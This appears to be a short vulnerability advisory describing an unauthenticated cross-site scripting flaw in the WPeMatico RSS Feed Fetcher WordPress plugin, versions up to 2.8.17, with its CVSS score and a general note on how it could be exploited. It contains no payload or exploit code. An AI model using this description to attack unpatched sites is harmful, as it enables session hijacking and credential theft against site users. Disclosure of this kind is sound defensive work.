Impact
The vulnerability is a classic reflected or stored cross‑site scripting flaw in the WordPress WPeMatico RSS Feed Fetcher plugin, allowing an attacker to inject malicious scripts that run in the context of any user who views the affected page. Because the flaw is unauthenticated, an attacker does not need credentials to exploit it, increasing the potential damage to confidentiality and integrity of user sessions, including credential theft or session hijacking.
Affected Systems
Vendors: WordPress plugin developer etruel; Product: WPeMatico RSS Feed Fetcher. Versions up to and including 2.8.17 are affected. All WordPress sites using this plugin version are at risk.
Risk and Exploitability
The CVSS score of 7.1 classifies this as high severity. The EPSS score is not available, indicating insufficient data on exploitation probability. The vulnerability is not listed in the CISA KEV catalog, but the lack of mitigation by the plugin version means an attacker can craft a malicious URL or feed entry to trigger XSS. The likely attack vector is via an unauthenticated user visiting a page that displays content from the plugin, making the exploit straightforward and low‑effort when the site is publicly accessible.
OpenCVE Enrichment